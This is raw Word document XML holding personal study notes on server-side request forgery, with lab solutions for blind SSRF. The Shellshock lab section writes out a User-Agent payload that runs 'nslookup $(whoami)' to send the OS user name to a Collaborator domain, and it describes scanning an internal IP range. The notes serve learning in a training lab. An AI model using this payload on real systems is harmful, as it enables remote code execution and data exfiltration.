    <w:p w14:paraId="39CCC825" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:t>URLs within data formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00271946" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Some applications transmit data in formats with a specification that allows the inclusion of URLs that might get requested by the data parser for the format. An obvious example of this is the XML data format, which has been widely used in web applications to transmit structured data from the client </w:t>
      </w:r>
      <w:r w:rsidRPr="0029794D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">to the server. When an application accepts data in XML format and parses it, it might be vulnerable to XXE injection. It might also be vulnerable to SSRF via XXE. We'll cover this in more detail when we look at XXE injection vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77014022" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:t>SSRF via the Referer header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060650EB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Some applications use server-side analytics software to tracks visitors. This software often logs the Referer header in requests, so it can track incoming links. Often the analytics software visits any third-party URLs that appear in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header is often a useful attack surface for SSRF vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AECE9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="0029794D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Blind SSRF vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve"> for examples of vulnerabilities involving the Referer header. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F808F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133C696" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:anchor="aux" w:history="1">
        <w:r w:rsidRPr="0029794D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cracking the lens: Targeting auxiliary systems</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A566420" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="0029794D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>URL validation bypass cheat sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F4BEE39" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="1EFEEF4E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="352F3AB5" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="6FEC1482" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="002A3FD7" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002A3FD7">
        <w:t>Blind SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDBA880" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="002A3FD7" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="002A3FD7">
        <w:t xml:space="preserve">In this section, we'll explain what blind server-side request forgery is, describe some common blind SSRF examples, and explain how to find and exploit blind SSRF vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC1848" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="002A3FD7" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002A3FD7">
        <w:t>What is blind SSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C5D92" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="002A3FD7">
        <w:t xml:space="preserve">Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE7497" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00187B74">
        <w:t>What is the impact of blind SSRF vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BBACA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF vulnerabilities because of their one-way nature. They cannot be trivially exploited to retrieve sensitive data from back-end systems, although in some situations they can be exploited to achieve full remote code execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689D3FD" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00187B74">
        <w:t>How to find and exploit blind SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30966D73" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">The most reliable way to detect blind SSRF vulnerabilities is using out-of-band (OAST) techniques. This involves attempting to trigger an HTTP request to an external system that you control, and monitoring for network interactions with that system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F194C5" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The easiest and most effective way to use out-of-band techniques is using </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="00187B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">. You can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="00187B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Burp Collaborator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve"> to generate unique domain names, send these in payloads to the application, and monitor for any interaction with those domains. If an incoming HTTP request is observed coming from the application, then it is vulnerable to SSRF. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE501AF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187B74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7E98A6" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">It is common when testing for SSRF vulnerabilities to observe a DNS look-up for the supplied Collaborator domain, but no subsequent HTTP request. This typically happens because the application attempted to make an HTTP request to the domain, which caused the initial DNS lookup, but the actual HTTP request was blocked by network-level filtering. It is relatively common for infrastructure to allow outbound DNS traffic, since this is needed for so many purposes, but block HTTP connections to unexpected destinations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2FEBB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="4BE33163" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00187B74" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA7AB4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve">PRACTITIONER </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00187B74">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Blind SSRF with out-of-band detection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Sol- </w:t>
      </w:r>
      <w:r w:rsidRPr="007A07F6">
        <w:t xml:space="preserve">This site uses analytics software which fetches the URL specified in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97A2D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="007A07F6">
        <w:t xml:space="preserve"> header when a product page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F724020" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="007A07F6">
        <w:t>use this functionality to cause an HTTP request to the public Burp Collaborator server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D130BAE" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Click on product (view details) and capture request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3D606" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Its out of band so we cant get response on front end -&gt; so we are using burp collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426666B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>-&gt; go to collaborator -&gt; copy to clipboard its domain and put it in Http referrer heder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033E03B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>If it is vulnerable to blind ssrf it will give info in poll in tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DE43E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>And it is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899E9D4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F170A2E" wp14:editId="61EE7CB9">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="175076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68838" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC328C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>No impact on front end but dns and http request captured in collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BF81C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1533A259" wp14:editId="78E7DB56">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="181275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55511" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09F615" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="4532480A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00993348">
        <w:t>Simply identifying a blind SSRF vulnerability that can trigger out-of-band HTTP requests doesn't in itself provide a route to exploitability. Since you cannot view the response from the back-end request, the behavior can't be used to explore content on systems that the application server can reach. However, it can still be leveraged to probe for other vulnerabilities on the server itself or on other back-end systems. You can blindly sweep the internal IP address space, sending payloads designed to detect well-known vulnerabilities. If those payloads also employ blind out-of-band techniques, then you might uncover a critical vulnerability on an unpatched internal server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35027B41" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="3B3F3B5D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00993348" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B2C84" w14:textId="77777777" w:rsidR="00561754" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve">EXPERT </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="00993348">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Blind SSRF with Shellshock exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BC633" w14:textId="77777777" w:rsidR="006E778F" w:rsidRDefault="006E778F" w:rsidP="006E778F">
      <w:r>
        <w:t>Observation: If burp running on port 8081 its nit working should running on 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D534F5" w14:textId="42808163" w:rsidR="00E50F52" w:rsidRPr="00993348" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Sol- </w:t>
      </w:r>
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve">This site uses analytics software which fetches the URL specified in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00111098">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve"> header when a product page is loaded. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D4A23" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00993348">
        <w:t xml:space="preserve">se this functionality to perform a blind SSRF attack against an internal server in the 192.168.0.X range on port 8080. In the blind attack, use a Shellshock payload against the internal server to exfiltrate the name of the OS user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1DDDC" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Use of collaborator everywhere extension -&gt;It will automatically crawl for blind ssrf. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-&gt; In target add it to scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8FCCB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="2A66B03E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">It has identified where ssrf vulnerability in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408412B7" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Here vulnerability Referer as well as in User-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CEC84E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D67C7B" wp14:editId="4C727FD5">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="157174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47821" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7194D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9EDFAD" wp14:editId="6CF7CCC2">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="92412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27192" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C264F5" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="50A7D781" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>we’re going to perform shellshock vulnerability on user-agent -&gt; it allows to remote code execution on the server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">So we are adding shellshock payload in User-Agent. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52035B29" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Find payload on google (cloudflare) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD11ED" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0059028F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H "User-Agent: () { :; }; /bin/eject" </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="0059028F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="lightGray"/>
          </w:rPr>
          <w:t>http://example.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0735AFBB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>And we’re going to find nslookup $(whoami)-&gt;name of server and add collaborator domain in link.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>so payload will be -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A34B5D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0059028F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent: </w:t>
      </w:r>
      <w:r w:rsidRPr="00265615">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>() { :; }; /usr/bin/nslookup $(whoami).</w:t>
      </w:r>
      <w:r w:rsidRPr="00265615">
        <w:t>q3ude1nsolkxe18c5yy4wzygg7myaoyd.oastify.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EEBA0" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In Referer add Ip range using intruder if ip system is correct it will poll in collaborator section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F245D8" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7977114E" wp14:editId="67DFCDA7">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36958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83316" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6E5ED1" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It will not reflect on front end. </w:t>
      </w:r>
      <w:r w:rsidRPr="00862C5F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If we get requests in collaborator then following IP is of running system or server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Above 1 IP is not valid, so find out using intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17382842" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Range from 1-255(0 is usually default gateway) to find which IP is vulnerable to shellshock or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D2585" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FE1644D" wp14:editId="54D18F46">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210068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81430" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56454C56" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the collaborator name of system is displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E6419" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06725E34" wp14:editId="6C94A856">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9835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530" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
